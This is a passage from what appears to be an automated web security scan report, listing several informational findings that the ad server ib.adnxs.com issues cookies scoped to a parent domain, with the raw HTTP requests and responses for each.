Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=EAAYAA..; acb113196=5_[r^kI/7ZrO@Pn0nf8MvlYT!?enc=usDlsWbk4j8Ox07TwgDhPwAAAAAAAAhADsdO08IA4T-6wOWxZuTiP8LS2pGwuOcdBWHfHSmrEEK_fzdNAAAAAGI7AwA3AQAAZAAAAAIAAAA4UAIAPV0AAAEAAABVU0QAVVNEANgCWgCqAQAA4AUBAgUCAAUAAAAAsiOTEgAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482815%29%3Buf%28%27r%27%2C+151608%2C+1295482815%29%3Bppv%2882%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2884%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2811%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2882%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2884%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2887%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28619%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28620%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28621%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3B&cnd=!LR4gugjUEBC4oAkYwI8BIL26ASgAMVSzvcxm5OI_QhMIABAAGAAgASj-__________8BQg0IUhC-40sYpQggAygGQg0IVBDVlhsYgQQgAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhcvjr/?0P(*AuB-u**g1:XIEPGUMbNTs4#%DBZoIf(PCR0ep_TvkXX49-qCQB:hlS?9mnBp47]h3?C^q0Wv5MQ*ZwB-!3PYw5C215#'1yq9A1-rNS-!<d=acxcxImXfqnsb.XDvw(L75^wACGY+1'U74=YF]nOpI=48$^Tx()%_!wzkF2Ple$

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 21-Jan-2011 00:30:09 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:30:09 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb113196=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Wed, 20-Apr-2011 00:30:09 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb614429=5_[r^XI()vrO@Pn0nf8M=sK?z?enc=pyOAm8UL4j-wuVlyyz3gPwAAAAAAAAhAsLlZcss94D-nI4CbxQviP014-CWPh5xaBWHfHSmrEEIRgjdNAAAAAGI7AwA3AQAAZAAAAAIAAAA5UAIAPV0AAAEAAABVU0QAVVNEAKAAWAKqAQAAnAgBAgUCAAUAAAAAzB7BYQAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295483409%29%3Buf%28%27r%27%2C+151609%2C+1295483409%29%3Bppv%2882%2C+%276529242608667490381%27%2C+1295483409%2C+1305851409%2C+2132%2C+23869%29%3Bppv%2884%2C+%276529242608667490381%27%2C+1295483409%2C+1305851409%2C+2132%2C+23869%29%3Bppv%2811%2C+%276529242608667490381%27%2C+1295483409%2C+1305851409%2C+2132%2C+23869%29%3Bppv%2882%2C+%276529242608667490381%27%2C+1295483409%2C+1305851409%2C+2132%2C+23869%29%3Bppv%2884%2C+%276529242608667490381%27%2C+1295483409%2C+1305851409%2C+2132%2C+23869%29%3Bppv%2887%2C+%276529242608667490381%27%2C+1295483409%2C+1295569809%2C+2132%2C+23869%29%3Bppv%28619%2C+%276529242608667490381%27%2C+1295483409%2C+1295569809%2C+2132%2C+23869%29%3Bppv%28620%2C+%276529242608667490381%27%2C+1295483409%2C+1295569809%2C+2132%2C+23869%29%3Bppv%28621%2C+%276529242608667490381%27%2C+1295483409%2C+1295569809%2C+2132%2C+23869%29%3B&cnd=!MR7WtAjUEBC5oAkYwI8BIL26ASgAMbKd76fGC-I_QhMIABAAGAAgASj-__________8BQg0IUhC54i4YoxkgAygGQg0IVBC5yTMYhwogAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Fri, 21-Jan-2011 00:30:09 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:30:09 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7*@E:3F.0s]#%2L_'x%SEV/hnK7#=G#<huqu*`^-sAq$WUeUDuqkMr+c^Z(+ql_Y`mC^.fk]u+-ptW1B'#)hgVCgQw>7'NF7uNVkG0XN^BPJ.^ZXwcsDU[n.KmyD0IP?EJtun(LG%y$qg]mwnXkD%zsU*oU'LW('INuCClbQ^7w=g32M!L$Ue*y[MoYC89[aS; path=/; expires=Wed, 20-Apr-2011 00:30:09 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 20 Jan 2011 00:30:09 GMT
Content-Length: 440

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.martini/;net=cm;u=,cm-23797598_1295482817,11d765b6a10b1b3,sports,cm.cm_aa_gn1-cm.weath_l-cm.sports_l;;cmw=owl;sz=
...[SNIP]...

7.22. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.martini&size=160x600&referrer=http%3A%2F%2Fwww.sailinganarchy.com%2Findex_page1.php&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.martini%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-93054228_1295482822%2C11d765b6a10b1b3%2Csports%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sports_l-cm.weath_l%3B%3Bcmw%3Dowl%3Bsz%3D160x600%3Bnet%3Dcm%3Bord1%3D405617%3Bcontx%3Dsports%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sports_l%3Bbtg%3Dcm.weath_l%3Bord%3D423951444%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.sailinganarchy.com/index_page1.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: acb113196=5_[r^kI/7ZrO@Pn0nf8MvlYT!?enc=usDlsWbk4j8Ox07TwgDhPwAAAAAAAAhADsdO08IA4T-6wOWxZuTiP8LS2pGwuOcdBWHfHSmrEEK_fzdNAAAAAGI7AwA3AQAAZAAAAAIAAAA4UAIAPV0AAAEAAABVU0QAVVNEANgCWgCqAQAA4AUBAgUCAAUAAAAAsiOTEgAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482815%29%3Buf%28%27r%27%2C+151608%2C+1295482815%29%3Bppv%2882%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2884%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2811%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2882%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2884%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2887%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28619%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28620%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28621%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3B&cnd=!LR4gugjUEBC4oAkYwI8BIL26ASgAMVSzvcxm5OI_QhMIABAAGAAgASj-__________8BQg0IUhC-40sYpQggAygGQg0IVBDVlhsYgQQgAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; sess=1; icu=EAAYAA..; acb303093=5_[r^XI()vrO@Pn0nf8MwM9g$?enc=pyOAm8UL4j-wuVlyyz3gPwAAAAAAAAhAsLlZcss94D-nI4CbxQviP9CL-hxz-rYyBWHfHSmrEELBfzdNAAAAAGI7AwA3AQAAZAAAAAIAAAA5UAIAPV0AAAEAAABVU0QAVVNEAKAAWAKqAQAAeggBAgUCAAUAAAAALyC12AAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482817%29%3Buf%28%27r%27%2C+151609%2C+1295482817%29%3Bppv%2882%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2884%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2811%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2882%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2884%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2887%2C+%273654383519972101072%27%2C+1295482817%2C+1295569217%2C+2132%2C+23869%29%3Bppv%28619%2C+%273654383519972101072%27%2C+1295482817%2C+1295569217%2C+2132%2C+23869%29%3Bppv%28620%2C+%273654383519972101072%27%2C+1295482817%2C+1295569217%2C+2132%2C+23869%29%3Bppv%28621%2C+%273654383519972101072%27%2C+1295482817%2C+1295569217%2C+2132%2C+23869%29%3B&cnd=!MR7WtAjUEBC5oAkYwI8BIL26ASgAMbKd76fGC-I_QhMIABAAGAAgASj-__________8BQg0IUhC54i4YoxkgAygGQg0IVBC5yTMYhwogAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7*@E:3F.0s]#%2L_'x%SEV/hnK7#=G#<huqu*`^-sAq$WUeUDuqkMr+c^Z(+ql_Y`mC^.fk]u+-ptW1B'#)hgVCgQw>7'NF7uNVkG0XN^BPJ.^ZXwcsDU[n.KmyD0IP?EJtun(LG%y$qg]mwnXkD%rDs0:0$Ob('INuCClbQ^7w=g32LzAgGCPGs/^Zf3+TaP

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 21-Jan-2011 00:20:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:20:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Wed, 20-Apr-2011 00:20:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb778475=5_[r^XI()vrO@Pn0nf8M!j@7*?enc=pyOAm8UL4j-wuVlyyz3gPwAAAAAAAAhAsLlZcss94D-nI4CbxQviPzkMt5lmDXglBWHfHSmrEELGfzdNAAAAAGI7AwA3AQAAZAAAAAIAAAA5UAIAPV0AAAEAAABVU0QAVVNEAKAAWAKqAQAA_gYBAgUCAAUAAAAAlR4hLwAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482822%29%3Buf%28%27r%27%2C+151609%2C+1295482822%29%3Bppv%2882%2C+%272699922710925347897%27%2C+1295482822%2C+1305850822%2C+2132%2C+23869%29%3Bppv%2884%2C+%272699922710925347897%27%2C+1295482822%2C+1305850822%2C+2132%2C+23869%29%3Bppv%2811%2C+%272699922710925347897%27%2C+1295482822%2C+1305850822%2C+2132%2C+23869%29%3Bppv%2882%2C+%272699922710925347897%27%2C+1295482822%2C+1305850822%2C+2132%2C+23869%29%3Bppv%2884%2C+%272699922710925347897%27%2C+1295482822%2C+1305850822%2C+2132%2C+23869%29%3Bppv%2887%2C+%272699922710925347897%27%2C+1295482822%2C+1295569222%2C+2132%2C+23869%29%3Bppv%28619%2C+%272699922710925347897%27%2C+1295482822%2C+1295569222%2C+2132%2C+23869%29%3Bppv%28620%2C+%272699922710925347897%27%2C+1295482822%2C+1295569222%2C+2132%2C+23869%29%3Bppv%28621%2C+%272699922710925347897%27%2C+1295482822%2C+1295569222%2C+2132%2C+23869%29%3B&cnd=!MR7WtAjUEBC5oAkYwI8BIL26ASgAMbKd76fGC-I_QhMIABAAGAAgASj-__________8BQg0IUhC54i4YoxkgAygGQg0IVBC5yTMYhwogAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Fri, 21-Jan-2011 00:20:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:20:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG49EE:3F.0s]#%2L_'x%SEV/hnLCF=G#<huqu*`^-sAq$WUeUDuqkMr+c^Z(+ql_Y`mC^.fk]u+-ptW1B'#)'qHqWd-AGmScENVx-p:Y9b66ZCJLN[8yvY$hcwDwhp^RbpUUZcwln=gw`]wKC0A)'9Dj6XfCjr1a#[D:I(3<csJ3xssMdQ3gcc=Zx1u*B$99h/3z-gm; path=/; expires=Wed, 20-Apr-2011 00:20:22 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 20 Jan 2011 00:20:22 GMT
Content-Length: 504

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.martini/;net=cm;u=,cm-93054228_1295482822,11d765b6a10b1b3,sports,cm.cm_aa_gn1-cm.sportsreg-cm.sports_l-cm.weath_l
...[SNIP]...

7.23. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.martini&size=728x90&referrer=http%3A%2F%2Fwww.sailinganarchy.com%2Findex_page1.php&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.martini%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-82053649_1295482372%2C11d765b6a10b1b3%2Csports%2Ccm.cm_aa_gn1-cm.weath_l%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Bord1%3D707118%3Bcontx%3Dsports%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.weath_l%3Bord%3D3271752524%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.sailinganarchy.com/index_page1.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=EAAYAA..; sess=1; uuid2=4760492999213801733; anj=Kfu=8fG10Qcvjr/?0P(*AuB-u**g1:XICjmUMbNTn>qsXgZ2Ox#Kzwi3jhndu4.q@P`fym?BM6A(6j?L^F^pT+$t)o#'1yqNmTr+csDU[n.KmyD0IP?EJtun(LG%y$qg]mw!5$=%sod-+0?6As/^Y`/=Uxi

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 21-Jan-2011 00:29:54 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:29:54 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Wed, 20-Apr-2011 00:29:54 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb261605=5_[r^kI/7ZrO@Pn0nf8M8*^ck?enc=usDlsWbk4j8Ox07TwgDhPwAAAAAAAAhADsdO08IA4T-6wOWxZuTiPyPsVQiJOiRCBWHfHSmrEEICgjdNAAAAAGI7AwA3AQAAZAAAAAIAAAA4UAIAPV0AAAEAAABVU0QAVVNEANgCWgCqAQAAGwkBAgUCAAUAAAAAYR-m3gAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295483394%29%3Buf%28%27r%27%2C+151608%2C+1295483394%29%3Bppv%2882%2C+%274765998665889606691%27%2C+1295483394%2C+1305851394%2C+2132%2C+23869%29%3Bppv%2884%2C+%274765998665889606691%27%2C+1295483394%2C+1305851394%2C+2132%2C+23869%29%3Bppv%2811%2C+%274765998665889606691%27%2C+1295483394%2C+1305851394%2C+2132%2C+23869%29%3Bppv%2882%2C+%274765998665889606691%27%2C+1295483394%2C+1305851394%2C+2132%2C+23869%29%3Bppv%2884%2C+%274765998665889606691%27%2C+1295483394%2C+1305851394%2C+2132%2C+23869%29%3Bppv%2887%2C+%274765998665889606691%27%2C+1295483394%2C+1295569794%2C+2132%2C+23869%29%3Bppv%28619%2C+%274765998665889606691%27%2C+1295483394%2C+1295569794%2C+2132%2C+23869%29%3Bppv%28620%2C+%274765998665889606691%27%2C+1295483394%2C+1295569794%2C+2132%2C+23869%29%3Bppv%28621%2C+%274765998665889606691%27%2C+1295483394%2C+1295569794%2C+2132%2C+23869%29%3B&cnd=!LR4gugjUEBC4oAkYwI8BIL26ASgAMVSzvcxm5OI_QhMIABAAGAAgASj-__________8BQg0IUhC-40sYpQggAygGQg0IVBDVlhsYgQQgAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Fri, 21-Jan-2011 00:29:54 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:29:54 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG10Qcvjr/?0P(*AuB-u**g1:XICjmUMbNTPg<>4lhRUC(PCR0ep_TvkXX49-qCQB:hlS?9mnBpbb)jKuoIgTwzHPZ2[uGVGi2$WVP]vE7ilpu2(MPy%SF(w77BERA(EO4I(3<csJ3xssMeZG!9KUs%nl<0; path=/; expires=Wed, 20-Apr-2011 00:29:54 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 20 Jan 2011 00:29:54 GMT
Content-Length: 402

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.martini/;net=cm;u=,cm-82053649_1295482372,11d765b6a10b1b3,sports,cm.cm_aa_gn1-cm.weath_l;;cmw=owl;sz=728x90;net=c
...[SNIP]...

7.24. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.martini&size=728x90&referrer=http%3A%2F%2Fwww.sailinganarchy.com%2Findex_page1.php&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.martini%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-69155988_1295482815%2C11d765b6a10b1b3%2Csports%2Ccm.cm_aa_gn1-cm.sports_l-cm.weath_l%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Bord1%3D777061%3Bcontx%3Dsports%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sports_l%3Bbtg%3Dcm.weath_l%3Bord%3D1768089178%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.sailinganarchy.com/index_page1.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=EAAYAA..; acb35548=5_[r^kI/7ZrO@Pn0nf8M8cp]i?enc=usDlsWbk4j8Ox07TwgDhPwAAAAAAAAhADsdO08IA4T-6wOWxZuTiP1729trACfBsBWHfHSmrEEIEfjdNAAAAAGI7AwA3AQAAZAAAAAIAAAA4UAIAPV0AAAEAAABVU0QAVVNEANgCWgCqAQAA6AgBAgUCAAUAAAAA3yJj0gAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482372%29%3Buf%28%27r%27%2C+151608%2C+1295482372%29%3Bppv%2882%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2884%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2811%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2882%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2884%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2887%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3Bppv%28619%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3Bppv%28620%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3Bppv%28621%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3B&cnd=!LR4gugjUEBC4oAkYwI8BIL26ASgAMVSzvcxm5OI_QhMIABAAGAAgASj-__________8BQg0IUhC-40sYpQggAygGQg0IVBDVlhsYgQQgAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; sess=1; uuid2=4760492999213801733; anj=Kfu=8fG3H<cvjr/?0P(*AuB-u**g1:XIC8]UMbNTs4#%DBZoIf(PCR0ep_TvkXX49-qCQB:hlS?9mnBp47]h3?C^q0Wv5MQ*ZwB-!3PYw5C215#'1yq9A1-rNS-!<d=acxcxImXfqnsb.XDvw(L75^wACGY+1'U74=YF]n@)*InD4_+

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 21-Jan-2011 00:20:15 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:20:15 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb35548=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Wed, 20-Apr-2011 00:20:15 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb113196=5_[r^kI/7ZrO@Pn0nf8MvlYT!?enc=usDlsWbk4j8Ox07TwgDhPwAAAAAAAAhADsdO08IA4T-6wOWxZuTiP8LS2pGwuOcdBWHfHSmrEEK_fzdNAAAAAGI7AwA3AQAAZAAAAAIAAAA4UAIAPV0AAAEAAABVU0QAVVNEANgCWgCqAQAA4AUBAgUCAAUAAAAAsiOTEgAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482815%29%3Buf%28%27r%27%2C+151608%2C+1295482815%29%3Bppv%2882%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2884%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2811%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2882%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2884%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2887%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28619%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28620%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28621%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3B&cnd=!LR4gugjUEBC4oAkYwI8BIL26ASgAMVSzvcxm5OI_QhMIABAAGAAgASj-__________8BQg0IUhC-40sYpQggAygGQg0IVBDVlhsYgQQgAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Fri, 21-Jan-2011 00:20:15 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:20:15 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhcvjr/?0P(*AuB-u**g1:XIEPGUMbNTs4#%DBZoIf(PCR0ep_TvkXX49-qCQB:hlS?9mnBp47]h3?C^q0Wv5MQ*ZwB-!3PYw5C215#'1yq9A1-rNS-!<d=acxcxImXfqnsb.XDvw(L75^wACGY+1'U74=YF]nOpI=48$^Tx()%_!wzkF2Ple$; path=/; expires=Wed, 20-Apr-2011 00:20:15 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 20 Jan 2011 00:20:15 GMT
Content-Length: 517

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.martini/;net=cm;u=,cm-69155988_1295482815,11d765b6a10b1b3,sports,cm.cm_aa_gn1-cm.sports_l-cm.weath_l;;cmw=owl;sz=
...[SNIP]...

7.25. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.martini&size=160x600&referrer=http%3A%2F%2Fwww.sailinganarchy.com%2Findex_page1.php&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.martini%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-93054228_1295482822%2C11d765b6a10b1b3%2Csports%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sports_l-cm.weath_l%3B%3Bcmw%3Dowl%3Bsz%3D160x600%3Bnet%3Dcm%3Bord1%3D405617%3Bcontx%3Dsports%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sports_l%3Bbtg%3Dcm.weath_l%3Bord%3D423951444%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.sailinganarchy.com/index_page1.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
